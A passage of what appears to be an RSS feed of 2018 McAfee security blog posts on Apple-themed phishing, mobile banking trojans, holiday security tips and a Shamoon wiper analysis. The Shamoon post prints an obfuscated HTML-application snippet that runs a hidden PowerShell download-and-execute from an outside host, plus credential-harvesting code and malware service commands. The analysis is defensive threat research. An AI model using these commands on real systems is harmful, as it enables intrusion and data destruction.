And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Rogue Drones Cause Gatwick Airport to Close for Over 30 Hours: More on This Threat appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/rogue-drones-cause-gatwick-airport-to-close/feed/ 0
Cybercriminals Disguised as Apple Are After Users’ Personal Data: Insights on This Threat https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/apple-phishing-scam/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/apple-phishing-scam/#respond Fri, 21 Dec 2018 19:00:39 +0000 https://securingtomorrow.mcafee.com/?p=93346

With the holidays rapidly approaching, many consumers are receiving order confirmation emails updating them on their online purchases for friends and family. What they don’t expect to see is an email that appears to be a purchase confirmation from the Apple App Store containing a PDF attachment of a receipt for a $30 app. This is […]

The post Cybercriminals Disguised as Apple Are After Users’ Personal Data: Insights on This Threat appeared first on McAfee Blogs.

]]>

With the holidays rapidly approaching, many consumers are receiving order confirmation emails updating them on their online purchases for friends and family. What they don’t expect to see is an email that appears to be a purchase confirmation from the Apple App Store containing a PDF attachment of a receipt for a $30 app. This is actually a stealthy phishing email, which has been circulating the internet, prompting users to click on a link if the transaction was unauthorized.

So how exactly does this phishing campaign work? In this case, the cybercriminals rely on the victim to be thrown off by the email stating that they purchased an app when they know that they didn’t. When the user clicks on the link in the receipt stating that the transaction was unauthorized, they are redirected to a page that looks almost identical to Apple’s legitimate Apple Account management portal. The user is prompted to enter their login credentials, only to receive a message claiming that their account has been locked for security reasons. If the user attempts to unlock their account, they are directed to a page prompting them to fill out personal details including their name, date of birth, and social security number for “account verification.”

Once the victim enters their personal and financial information, they are directed to a temporary page stating that they have been logged out to restore access to their account. The user is then directed to the legitimate Apple ID account management site, stating “this session was timed out for your security,” which only helps this attack seem extra convincing. The victim is led to believe that this process was completely normal, while the cybercriminals now have enough information to perform complete identity theft.

Although this attack does have some sneaky behaviors, there are a number of steps users can take to protect themselves from phishing scams like this one:

  • Be wary of suspicious emails. If you receive an email from an unknown source or notice that the “from” address itself seems peculiar, avoid interacting with the message altogether.
  • Go directly to the source. Be skeptical of emails claiming to be from companies asking to confirm a purchase that you don’t recognize. Instead of clicking on a link within the email, it’s best to go straight to the company’s website to check the status of your account or contact customer service.
  • Use a comprehensive security solution. It can be difficult to determine if a website, link, or file is risky or contains malicious content. Add an extra layer of security with a product like McAfee Total Protection.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Cybercriminals Disguised as Apple Are After Users’ Personal Data: Insights on This Threat appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/apple-phishing-scam/feed/ 0
How to Get Technology Working for You This Christmas https://securingtomorrow.mcafee.com/consumer/family-safety/how-to-get-technology-working-for-you-this-christmas/ https://securingtomorrow.mcafee.com/consumer/family-safety/how-to-get-technology-working-for-you-this-christmas/#respond Thu, 20 Dec 2018 09:10:32 +0000 https://securingtomorrow.mcafee.com/?p=93320

Harnessing the power of the internet and technology this Christmas may just be what you need to get over this extraordinarily stressful period. While many of you maybe all sorted for the big day, there are still many of us who aren’t. Many of us are still attending daily Christmas gatherings, still working, still trying […]

The post How to Get Technology Working for You This Christmas appeared first on McAfee Blogs.

]]>

Harnessing the power of the internet and technology this Christmas may just be what you need to get over this extraordinarily stressful period. While many of you maybe all sorted for the big day, there are still many of us who aren’t.

Many of us are still attending daily Christmas gatherings, still working, still trying to entertain kids, shop & most importantly, work out what we are going to serve to 25 people on Christmas day!!

So, let me share with you my top tips on how we can all use the wonders of the internet and technology to get through:

  1. E-Cards

If you haven’t done these yet – and let’s be honest very few do now – then scrap this idea immediately. But if your guilt just can’t be silenced then check out ecards. I personally love Smilebox but Lifewire has put together a list of the top ecard sites. But remember, always use a reputable site so your recipients as more likely to open them. Cybercrims have been known to send unsuspecting recipients ecards with the aim of trying to extract their personal information.

  1. Online Gift Shopping

Getting to the bottom of the Christmas gift list takes time. So, if you still have presents to buy then avoid the crowds and get online. There are still plenty of retailers who are guaranteeing delivery before Christmas. So, make yourself a cup of tea and set the timer for an hour. You’ll be surprised how much you can get done when you have a deadline! Finder.com has put together a list of the top 50 Australian shopping sites – check it out! I do have to disclose I have a soft spot for Peter’s of Kensington, Country Road and Myer online. Great service and speedy delivery!

But please remember to observe safe online shopping habits. Only buy from trusted retailers, look for a padlock at the start of a web address to ensure transactions are encrypted, avoid offers that are ‘too good to be true’ and don’t ever use public Wi-Fi to do your shopping.

  1. Get Some Extra Help Online

If you haven’t yet used Airtasker to help you work through your to-do list, then you need to start ASAP. Airtasker brings jobs and helpers together in an easy to use app. If your house needs a clean or the garden needs a makeover before the relatives arrive, then log on and create a job and wait for Airtaskers to bid on it. So easy!

  1. Create an Online To-Do List

There’s nothing like a bit of planning to reduce pressure. Why not create a to-do list in Google Docs or an Excel spreadsheet to identify which family member is responsible for what on the big day? Alternatively, you could create your to-do list in an app like Todoist and then send each person’s task directly to their inbox? Very organised indeed!

So, let’s all take a deep breath. Christmas 2018 is going to be fantastic. Let’s get technology working for us so we can get through our to-do lists and be super parents – even though we all know they just don’t exist!

Merry Christmas

Alex xx

The post How to Get Technology Working for You This Christmas appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/family-safety/how-to-get-technology-working-for-you-this-christmas/feed/ 0
The Results Are In: Fake Apps and Banking Trojans Are A Cybercriminal Favorite https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/fake-apps-and-banking-trojans/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/fake-apps-and-banking-trojans/#respond Thu, 20 Dec 2018 00:39:12 +0000 https://securingtomorrow.mcafee.com/?p=93318

Today, we are all pretty reliant on our mobile technology. From texting, to voice messaging, to mobile banking, we have a world of possibilities at our fingertips. But what happens when the bad guys take advantage of our reliance on mobile and IoT technology to threaten our cybersecurity? According to the latest McAfee Labs Threats […]

The post The Results Are In: Fake Apps and Banking Trojans Are A Cybercriminal Favorite appeared first on McAfee Blogs.

]]>

Today, we are all pretty reliant on our mobile technology. From texting, to voice messaging, to mobile banking, we have a world of possibilities at our fingertips. But what happens when the bad guys take advantage of our reliance on mobile and IoT technology to threaten our cybersecurity? According to the latest McAfee Labs Threats Report, cybercriminals are leveraging fake apps and banking trojans to access users’ personal and financial information. In fact, our researchers saw an average of 480 new threats per minute and a sharp increase in malware targeting IoT devices during the last quarter. Let’s take a look at how these cyberthreats gained traction over the past few months.

While new mobile malware declined by 24% in Q3, our researchers did notice some unusual threats fueled by fake apps. Back in June, we observed a scam where crooks released YouTube videos with fake links disguised as leaked versions of Fortnite’s Android app. If a user clicked on the link to download this phony app, they would be asked to provide mobile verification. This verification process would prompt them to download app after app, putting money right in the cybercriminals’ pockets for increased app downloads.

Another fake app scheme that caught the attention of our researchers was Android/TimpDoor. This SMS phishing campaign tricked users into clicking on a link sent to them via text. The link would direct them to a fabricated web page urging them to download a fake voice messaging app. Once the victim downloaded the fake app, the malware would begin to collect the user’s device information. Android/TimpDoor would then be able to let cybercriminals use the victim’s device to access their home network.

Our researchers also observed some peculiar behavior among banking trojans, a type of malware that disguises itself as a genuine app or software to obtain a user’s banking credentials. In Q3, cybercriminals employed uncommon file types to carry out spam email campaigns, accounting for nearly 500,000 emails sent worldwide. These malicious phishing campaigns used phrases such as “please confirm” or “payment” in the subject line to manipulate users into thinking the emails were of high importance. If a user clicked on the message, the banking malware would be able to bypass the email protection system and infect the device. Banking trojans were also found using two-factor operations in web injects, or packages that can remove web page elements and prevent a user from seeing a security alert. Because these web injects removed the need for two-factor authentication, cybercriminals could easily access a victim’s banking credentials from right under their noses.

But don’t worry – there’s good news. By reflecting on the evolving landscape of cybersecurity, we can better prepare ourselves for potential threats. Therefore, to prepare your devices for schemes such as these, follow these tips:

  • Go directly to the source. Websites like YouTube are often prone to links for fake websites and apps so criminals can make money off of downloads. Avoid falling victim to these frauds and only download software straight from a company’s home page.
  • Click with caution. Only click on links in text messages that are from trusted sources. If you receive a text message from an unknown sender, stay cautious and avoid interacting with the message.
  • Use comprehensive security. Whether you’re using a mobile banking app on your phone or browsing the internet on your desktop, it’s important to safeguard all of your devices with an extra layer of security. Use a robust security software like McAfee Total Protection so you can connect with confidence.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Homeon Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The Results Are In: Fake Apps and Banking Trojans Are A Cybercriminal Favorite appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/fake-apps-and-banking-trojans/feed/ 0
Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems/#respond Wed, 19 Dec 2018 21:45:13 +0000 https://securingtomorrow.mcafee.com/?p=93278

Last week the McAfee Advanced Threat Research team posted an analysis of a new wave of Shamoon “wiper” malware attacks that struck several companies in the Middle East and Europe. In that analysis we discussed one difference to previous Shamoon campaigns. The latest version has a modular approach that allows the wiper to be used […]

The post Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems appeared first on McAfee Blogs.

]]>

Last week the McAfee Advanced Threat Research team posted an analysis of a new wave of Shamoon “wiper” malware attacks that struck several companies in the Middle East and Europe. In that analysis we discussed one difference to previous Shamoon campaigns. The latest version has a modular approach that allows the wiper to be used as a standalone threat.

After further analysis of the three versions of Shamoon and based on the evidence we describe here, we conclude that the Iranian hacker group APT33—or a group masquerading as APT33—is likely responsible for these attacks.

In the Shamoon attacks of 2016–2017, the adversaries used both the Shamoon Version 2 wiper and the wiper Stonedrill. In the 2018 attacks, we find the Shamoon Version 3 wiper as well as the wiper Filerase, first mentioned by Symantec.

These new wiper samples (Filerase) differ from the Shamoon Version 3, which we analyzed last week. The latest Shamoon appears to be part of a toolkit with several modules. We identified the following modules:

  • OCLC.exe: Used to read a list of targeted computers created by the attackers. This tool is responsible to run the second tool, spreader.exe, with the list of each targeted machine.
  • Spreader.exe: Used to spread the file eraser in each machine previously set. It also gets information about the OS version.
  • SpreaderPsexec.exe: Similar to spreader.exe but uses psexec.exe to remotely execute the wiper.
  • SlHost.exe: The new wiper, which browses the targeted system and deletes every file.

The attackers have essentially packaged an old version (V2) of Shamoon with an unsophisticated toolkit coded in .Net. This suggests that multiple developers have been involved in preparing the malware for this latest wave of attacks. In our last post, we observed that Shamoon is a modular wiper that can be used by other groups. With these recent attacks, this supposition seems to be confirmed. We have learned that the adversaries prepared months in advance for this attack, with the wiper execution as the goal.

This post provides additional insight about the attack and a detailed analysis of the .Net tool kit.

Geopolitical context

The motivation behind the attack is still unclear. Shamoon Version 1 attacked just two targets in the Middle East. Shamoon Version 2 attacked multiple targets in Saudi Arabia. Version 3 went after companies in the Middle East by using their suppliers in Europe, in a supply chain attack.

Inside the .Net wiper, we discovered the following ASCII art:

These characters resemble the Arabic text تَبَّتْ يَدَا أَبِي لَهَبٍ وَتَبَّ. This is a phrase from the Quran (Surah Masad, Ayat 1 [111:1]) that means “perish the hands of the Father of flame” or “the power of Abu Lahab will perish, and he will perish.” What does this mean in the context of a cyber campaign targeting energy industries in the Middle East?

Overview of the attack

 

How did the malware get onto the victim’s network?

We received intelligence that the adversaries had created websites closely resembling legitimate domains which carry job offerings. For example:

  • Hxxp://possibletarget.ddns.com:880/JobOffering.

Many of the URLs we discovered were related to the energy sector operating mostly in the Middle East. Some of these sites contained malicious HTML application files that execute other payloads. Other sites lured victims to login using their corporate credentials. This preliminary attack seems to have started by the end of August 2018, according to our telemetry, to gather these credentials.

A code example from one malicious HTML application file:

YjDrMeQhBOsJZ = “WS”

wcpRKUHoZNcZpzPzhnJw = “crip”

RulsTzxTrzYD = “t.Sh”

MPETWYrrRvxsCx = “ell”

PCaETQQJwQXVJ = (YjDrMeQhBOsJZ + wcpRKUHoZNcZpzPzhnJw + RulsTzxTrzYD + MPETWYrrRvxsCx)

OoOVRmsXUQhNqZJTPOlkymqzsA=new ActiveXObject(PCaETQQJwQXVJ)

ULRXZmHsCORQNoLHPxW = “cm”

zhKokjoiBdFhTLiGUQD = “d.e”

KoORGlpnUicmMHtWdpkRwmXeQN = “xe”

KoORGlpnUicmMHtWdp = “.”

KoORGlicmMHtWdp = “(‘http://mynetwork.ddns.net:880/*****.ps1’)

OoOVRmsXUQhNqZJTPOlkymqzsA.run(‘%windir%\\System32\\’ + FKeRGlzVvDMH + ‘ /c powershell -w 1 IEX (New-Object Net.WebClient)’+KoORGlpnUicmMHtWdp+’downloadstring’+KoORGlicmMHtWdp)

OoOVRmsXUQhNqZJTPOlkymqzsA.run(‘%windir%\\System32\\’ + FKeRGlzVvDMH + ‘ /c powershell -window hidden -enc

The preceding script opens a command shell on the victim’s machine and downloads a PowerShell script from an external location. From another location, it loads a second file to execute.

We discovered one of the PowerShell scripts. Part of the code shows they were harvesting usernames, passwords, and domains:

function primer {

if ($env:username -eq “$($env:computername)$”){$u=”NT AUTHORITY\SYSTEM”}else{$u=$env:username}

$o=”$env:userdomain\$u

$env:computername

$env:PROCESSOR_ARCHITECTURE

With legitimate credentials to a network it is easy to login and spread the wipers.

.Net tool kit

The new wave of Shamoon is accompanied by a .Net tool kit that spreads Shamoon Version 3 and the wiper Filerase.

This first component (OCLC.exe) reads two text files stored in two local directories. Directories “shutter” and “light” contain a list of targeted machines.

OCLC.exe starts a new hidden command window process to run the second component, spreader.exe, which spreads the Shamoon variant and Filerase with the concatenated text file as parameter.

The spreader component takes as a parameter the text file that contains the list of targeted machines and the Windows version. It first checks the Windows version of the targeted computers.

The spreader places the executable files (Shamoon and Filerase) into the folder Net2.

It creates a folder on remote computers: C:\\Windows\System32\Program Files\Internet Explorer\Signing.

The spreader copies the executables into that directory.

It runs the executables on the remote machine by creating a batch file in the administrative share \\RemoteMachine\admin$\\process.bat. This file contains the path of the executables. The spreader then sets up the privileges to run the batch file.

If anything fails, the malware creates the text file NotFound.txt, which contains the name of the machine and the OS version. This can be used by the attackers to track any issues in the spreading process.

The following screenshot shows the “execute” function:

If the executable files are not present in the folder Net2, it checks the folders “all” and Net4.

To spread the wipers, the attackers included an additional spreader using Psexec.exe, an administration tool used to remotely execute commands.

The only difference is that this spreader uses psexec, which is supposed to be stored in Net2 on the spreading machine. It could be used on additional machines to move the malware further.

The wiper contains three options:

  • SilentMode: Runs the wiper without any output.
  • BypassAcl: Escalates privileges. It is always enabled.
  • PrintStackTrace: Tracks the number of folders and files erased.

The BypassAcl option is always “true” even if the option is not specified. It enables the following privileges:

  • SeBackupPrivilege
  • SeRestorePrivilege
  • SeTakeOwnershipPrivilege
  • SeSecurityPrivilege

To find a file to erase, the malware uses function GetFullPath to get all paths.

It erases each folder and file.

The malware browses every file in every folder on the system.

To erase all files and folders, it first removes the “read only’ attributes to overwrite them.

It changes the creation, write, and access date and time to 01/01/3000 at 12:01:01 for each file.

The malware rewrites each file two times with random strings.

It starts to delete the files using the API CreateFile with the ACCESS_MASK DELETE flag.

Then it uses FILE_DISPOSITION_INFORMATION to delete the files.

The function ProcessTracker has been coded to track the destruction.

Conclusion

In the 2017 wave of Shamoon attacks, we saw two wipers; we see a similar feature in the December 2018 attacks. Using the “tool kit” approach, the attackers can spread the wiper module through the victims’ networks. The wiper is not obfuscated and is written in .Net code, unlike the Shamoon Version 3 code, which is encrypted to mask its hidden features.

Attributing this attack is difficult because we do not have all the pieces of the puzzle. We do see that this attack is in line with the Shamoon Version 2 techniques. Political statements have been a part of every Shamoon attack. In Version 1, the image of a burning American flag was used to overwrite the files. In Version 2, the picture of a drowned Syrian boy was used, with a hint of Yemeni Arabic, referring to the conflicts in Syria and Yemen. Now we see a verse from the Quran, which might indicate that the adversary is related to another Middle Eastern conflict and wants to make a statement.

When we look at the tools, techniques, and procedures used during the multiple waves, and by matching the domains and tools used (as FireEye described in its report), we conclude that APT33 or a group attempting to appear to be APT33 is behind these attacks.

 

Coverage

The files we detected during this incident are covered by the following signatures:

  • Trojan-Wiper
  • RDN/Generic.dx
  • RDN/Ransom

Indicators of compromise

Hashes

  • OCLC.exe: d9e52663715902e9ec51a7dd2fea5241c9714976e9541c02df66d1a42a3a7d2a
  • Spreader.exe: 35ceb84403efa728950d2cc8acb571c61d3a90decaf8b1f2979eaf13811c146b
  • SpreaderPsexec.exe: 2ABC567B505D0678954603DCB13C438B8F44092CFE3F15713148CA459D41C63F
  • Slhost.exe: 5203628a89e0a7d9f27757b347118250f5aa6d0685d156e375b6945c8c05eb8a

File paths and filenames

  • C:\net2\
  • C:\all\
  • C:\net4\
  • C:\windows\system32\
  • C:\\Windows\System32\Program Files\Internet Explorer\Signing
  • \\admin$\process.bat
  • NothingFound.txt
  • MaintenaceSrv32.exe
  • MaintenaceSrv64.exe
  • SlHost.exe
  • OCLC.exe
  • Spreader.exe
  • SpreaderPsexec.exe

Some command lines

  • cmd.exe /c “”C:\Program Files\Internet Explorer\signin\MaintenaceSrv32.bat
  • cmd.exe /c “ping -n 30 127.0.0.1 >nul && sc config MaintenaceSrv binpath= C:\windows\system32\MaintenaceSrv64.exe LocalService” && ping -n 10 127.0.0.1 >nul && sc start MaintenaceSrv
  • MaintenaceSrv32.exe LocalService
  • cmd.exe /c “”C:\Program Files\Internet Explorer\signin\MaintenaceSrv32.bat ” “
  • MaintenaceSrv32.exe service

 

 

 

 

 

The post Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems/feed/ 0
McAfee Labs Threats Report Examines Cybercriminal Underground, IoT Malware, Other Threats https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-threats-report-examines-cybercriminal-underground-iot-malware-other-threats/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-threats-report-examines-cybercriminal-underground-iot-malware-other-threats/#respond Wed, 19 Dec 2018 05:01:10 +0000 https://securingtomorrow.mcafee.com/?p=93260

The McAfee Advanced Threat Research team today published the McAfee® Labs Threats Report, December 2018. In this edition, we highlight the notable investigative research and trends in threats statistics and observations gathered by the McAfee Advanced Threat Research and McAfee Labs teams in Q3 of 2018. We are very excited to present to you new […]

The post McAfee Labs Threats Report Examines Cybercriminal Underground, IoT Malware, Other Threats appeared first on McAfee Blogs.

]]>

The McAfee Advanced Threat Research team today published the McAfee® Labs Threats Report, December 2018. In this edition, we highlight the notable investigative research and trends in threats statistics and observations gathered by the McAfee Advanced Threat Research and McAfee Labs teams in Q3 of 2018.

We are very excited to present to you new insights and a new format in this report. We are dedicated to listening to our customers to determine what you find important and how we can add value. In recent months we have gathered more threat intelligence, correlating and analyzing data to provide more useful insights into what is happening in the evolving threat landscape. McAfee is collaborating closely with MITRE Corporation in extending the techniques of its MITRE ATT&CK™ knowledge base, and we now include the model in our report. We are always working to refine our process and reports. You can expect more from us, and we welcome your feedback.

As we dissect the threat landscape for Q3, some noticeable statistics jump out of the report.  In particular, the continued rise in cryptojacking, which has made an unexpected emergence over the course of a year. In Q3 the growth of coin miner malware returned to unprecedented levels after a temporary slowdown in Q2.

Our analysis of recent threats included one notable introduction in a disturbing category. In Q3 we saw two new exploit kits: Fallout and Underminer. Fallout almost certainly had a bearing on the spread of GandCrab, the leading ransomware. Five years ago we published the report “Cybercrime Exposed,” which detailed the rise of cybercrime as a service. Exploit kits are the epitome of this economy, affording anyone the opportunity to easily and cheaply enter the digital crime business.

New malware samples jumped up again in Q3 after a decline during the last two quarters. Although the upward trend applies to almost every category, we did measure a decline in new mobile malware samples following three quarters of continual growth.

This post is only a small snapshot of the comprehensive analysis provided in the December Threats Report. We hope you enjoy the new format, and we welcome your feedback.

The post McAfee Labs Threats Report Examines Cybercriminal Underground, IoT Malware, Other Threats appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-threats-report-examines-cybercriminal-underground-iot-malware-other-threats/feed/ 0
McAfee Named a 2018 Gartner Peer Insights Customers’ Choice for Enterprise Data Loss Prevention https://securingtomorrow.mcafee.com/business/data-security/mcafee-named-a-2018-gartner-peer-insights-customers-choice-for-enterprise-data-loss-prevention/ https://securingtomorrow.mcafee.com/business/data-security/mcafee-named-a-2018-gartner-peer-insights-customers-choice-for-enterprise-data-loss-prevention/#respond Tue, 18 Dec 2018 18:00:25 +0000 https://securingtomorrow.mcafee.com/?p=93246

I am excited to announce that McAfee has been recognized as a 2018 Gartner Peer Insights Customers’ Choice for Enterprise Data Loss Prevention. I believe our position as a 2018 Gartner Peer Insights Customers’ Choice for Enterprise Data Loss Prevention is a testament that our device-to-cloud DLP integration of enterprise products helps our customers stay […]

The post McAfee Named a 2018 Gartner Peer Insights Customers’ Choice for Enterprise Data Loss Prevention appeared first on McAfee Blogs.

]]>

I am excited to announce that McAfee has been recognized as a 2018 Gartner Peer Insights Customers’ Choice for Enterprise Data Loss Prevention. I believe our position as a 2018 Gartner Peer Insights Customers’ Choice for Enterprise Data Loss Prevention is a testament that our device-to-cloud DLP integration of enterprise products helps our customers stay on top of evolving security needs, with solutions that are simple, flexible, comprehensive and fast, so that our customers can act decisively and mitigate risks. McAfee takes great pride in being recognized by our customers on Gartner Peers Insights.

In its announcement, Gartner explains, “The Gartner Peer Insights Customers’ Choice is a recognition of vendors in this market by verified end-user professionals, considering both the number of reviews and the overall user ratings.” To ensure fair evaluation, Gartner maintains rigorous criteria for recognizing vendors with a high customer satisfaction rate.

 

 

 

For this distinction, a vendor must have a minimum of 50 published reviews with an average overall rating of 4.2 stars or higher during the sourcing period. McAfee met these criteria for McAfee Data Loss Prevention.

Here are some excerpts from customers that contributed to the distinction:

“McAfee DLP Rocks! Easy to implement, easy to administer, pretty robust”

Security and Privacy Manager in the Services Industry

“Flexible solution. Being able to rapidly deploy additional Discover systems as needed as the company expanded was a huge time saving. Being able to then recover the resources while still being able to complete weekly delta discovery on new files being added or changed saved us tens of thousands of dollars quarterly.”

IT Security Manager in the Finance Industry

“McAfee DLP Endpoint runs smoothly even in limited resource environments and it supports multiple platforms like windows and mac-OS. Covers all major vectors of data leakages such as emails, cloud uploads, web postings and removable media file sharing.”

Knowledge Specialist in the Communication Industry

“McAfee DLP (Host and Network) are integrated and provide a simplified approach to rule development and uniform deployment.”

IT Security Engineer in the Finance Industry

 “Using ePO, it’s easy to deploy and manage the devices with different policies.”

Cyber Security Engineer in the Communication Industry

 

And those are just a few. You can read more reviews for McAfee Data Loss Prevention on the Gartner site.

On behalf of McAfee, I would like to thank all of our customers who took the time to share their experiences. We are honored to be a 2018 Gartner Peer Insights Customers’ Choice for Enterprise Data Loss Prevention and we know that it is your valuable feedback that made it possible. To learn more about this distinction, or to read the reviews written about our products by the IT professionals who use them, please visit Gartner Peer Insights’ Customers’ Choice.

 

  • Gartner Peer Insights’ Customers’ Choice announcement December 17, 2018
The GARTNER PEER INSIGHTS CUSTOMERS’ CHOICE badge is a trademark and service mark of Gartner, Inc., and/or its affiliates, and is used herein with permission. All rights reserved. Gartner Peer Insights Customers’ Choice constitute the subjective opinions of individual end-user reviews, ratings, and data applied against a documented methodology; they neither represent the views of, nor constitute an endorsement by, Gartner or its affiliates.

The post McAfee Named a 2018 Gartner Peer Insights Customers’ Choice for Enterprise Data Loss Prevention appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/data-security/mcafee-named-a-2018-gartner-peer-insights-customers-choice-for-enterprise-data-loss-prevention/feed/ 0
Giving Your Endpoint the Gift of Security This Holiday Season https://securingtomorrow.mcafee.com/business/endpoint-security/giving-your-endpoint-the-gift-of-security-this-holiday-season/ https://securingtomorrow.mcafee.com/business/endpoint-security/giving-your-endpoint-the-gift-of-security-this-holiday-season/#respond Tue, 18 Dec 2018 14:00:18 +0000 https://securingtomorrow.mcafee.com/?p=93238

Suddenly, it’s December, and the beginning of the holiday season. Your coworkers are now distracted with getting in their PTO, flying home to be with family, and completing their shopping lists. But the holiday season isn’t always filled with cheer, it’s got some scrooges too – cybercriminals, who hope to take advantage of the festive […]

The post Giving Your Endpoint the Gift of Security This Holiday Season appeared first on McAfee Blogs.

]]>

Suddenly, it’s December, and the beginning of the holiday season. Your coworkers are now distracted with getting in their PTO, flying home to be with family, and completing their shopping lists. But the holiday season isn’t always filled with cheer, it’s got some scrooges too – cybercriminals, who hope to take advantage of the festive fun to find vulnerabilities and infect unsecured devices. And with many employees out of office, these hackers could potentially pose a serious threat to an organization’s endpoints, and thereby its network. As a matter of fact, there are a few key reasons as to why your organization’s endpoints may be in danger during the holidays. Let’s take a look.

Business Shutdowns

Most companies close down for a handful of days during the holidays, if not a full week or two. That means less people manning the IT station, executing updates, and defending the network if cybercriminals manage to find a way inside. A lack of personnel could be just the opportunity cybercriminals need to take advantage of an open entry point and swoop data from an organization essentially undetected.

Holiday Spirit, Relaxed Attitude

For the employees that do stay online during the holidays, attitudes can range from relaxed to inattentive. Unless their product or service directly relates to the holidays and shopping, businesses tend to be quiet during this time. And with many coworkers out, employees tend to have less reason to be glued to their computer all the time. This could mean cyberattacks or necessary security actions go unattended – irregular activity may not seem as obvious or a necessary software update could go unresolved a little too long. What’s more – the lax attitude could potentially lead to a successful phishing attack. In fact, phishing scams are said to ramp up starting in October, as these cybercriminals are eager to time their tricks with the holiday season. In order to accurately identify a phishing scheme, users have to be aware and have their eyes on their inbox at all times. One false move could potentially expose the entire organization, creating a huge problem for the reduced staff on hand.

Holiday Travel = Public Wi-Fi

Workplace mobility is a great new aspect of the modern age – it permits employees more flexibility and allows them to work from essentially anywhere in the world. But if employees are working out of a public space – such as a coffee shop or an airport – they are likely using public Wi-Fi, which is one of the most common attack vectors for cybercriminals today. That’s because there are flaws in the encryption standards that secure Wi-Fi networks and cybercriminals can leverage these to hack into a network and intercept or infect users’ traffic. If an employee is traveling home for the holidays and using public Wi-Fi to get work done while they do, they could potentially expose any private company information that lies within their device.

BYOD in Full Force

Speaking of modern workplace policies, Bring Your Own Device (or BYOD) – a program that allows employees to bring their own personal devices into work – is a common phenomenon these days. With this program, employees’ personal devices connect to the business’ network to work and likely access company data.

That means there is crucial data living on these personal devices, which could be jeopardized when the devices travel outside of the organization. With the holidays, these devices are likely accompanying the employees on their way to visit family, which means they could be left at an airport or hotel. Beyond that, these employees are more likely to access emails and company data through these mobile devices while they are out of the office. And with more connected devices doing company business, there are simply more chances for device and/or data theft.

Staying Secure While Staying Festive

Now, no one wants their employees to be online all the time during the holidays. Fortunately, there are actions organizations can take to ensure their employees and their network are merry and bright, as well as secure. First and foremost, conduct some necessary security training. Put every employee through security training courses so they’re aware of the risks of public Wi-Fi and are reminded to be extra vigilant of phishing emails during this time. Then, make sure all holes are patched and every update has been made before everyone turns their attention to yuletide festivities. Lastly, if an employee is working remotely – remind them to always use a VPN.

No matter who’s in the office and who’s not, it’s important to have always-on security that is armed for the latest zero-day exploits – like McAfee Endpoint Security. You can’t prevent every user from connecting to a public network or one that is set up for phishing, but you can ensure they have an active defense that takes automatic corrective actions. That way, employees can enjoy the time off and return to a safe and secure enterprise come the new year.

To learn more about endpoint security and McAfee’s strategies for it, be sure to follow us at @McAfee and @McAfee_Business.

 

The post Giving Your Endpoint the Gift of Security This Holiday Season appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/endpoint-security/giving-your-endpoint-the-gift-of-security-this-holiday-season/feed/ 0
What CES Can Show Us About Evolving Consumer Security Needs: A Timeline https://securingtomorrow.mcafee.com/consumer/mobile-and-iot-security/ces-evolving-security-needs-a-digital-life-timeline/ https://securingtomorrow.mcafee.com/consumer/mobile-and-iot-security/ces-evolving-security-needs-a-digital-life-timeline/#respond Tue, 18 Dec 2018 14:00:01 +0000 https://securingtomorrow.mcafee.com/?p=93230

Appropriately dubbed the ‘Global Stage for Innovation,’ it’s no wonder CES showcases the most cutting-edge consumer technologies coming out in the year ahead. No topic is off the table; Attendees will learn more about connected homes, smart cities and self-driving cars, try out shiny new digital health wearables, headsets, and other connected tech, explore AI-driven […]

The post What CES Can Show Us About Evolving Consumer Security Needs: A Timeline appeared first on McAfee Blogs.

]]>

Appropriately dubbed the ‘Global Stage for Innovation,’ it’s no wonder CES showcases the most cutting-edge consumer technologies coming out in the year ahead. No topic is off the table; Attendees will learn more about connected homes, smart cities and self-driving cars, try out shiny new digital health wearables, headsets, and other connected tech, explore AI-driven technologies, and so much more.

Although events like CES showcase breakthrough technologies, interestingly, they also highlight how rapidly new technology is replaced with the next new thing. The rate at which we are treading on new ground is shifting exponentially, and what we see at CES this January might be obsolete in just a few years.

This rapidly changing technological landscape poses a significant predicament to consumers, a ‘digital dilemma’ if you will: as new technologies accelerate and IoT devices that house them progress, new challenges arise with them. This is particularly the case when it comes to security and privacy. And, just as security and products change and adapt, so do our needs and wants as consumers. Those of a teen differ from those of a parent, from those of a baby boomer, and so on. Let’s see how those needs change over time.

A Digital Life Timeline

2015: The Teen Technologist

Born in the late ‘90s, this teen is an everyday gamer, who loves to play games online with friends. They also love their smartphone, mostly for the access to social media. A teen wouldn’t necessarily be concerned with security, so having a comprehensive system built in is crucial.

2021: The Young Professional

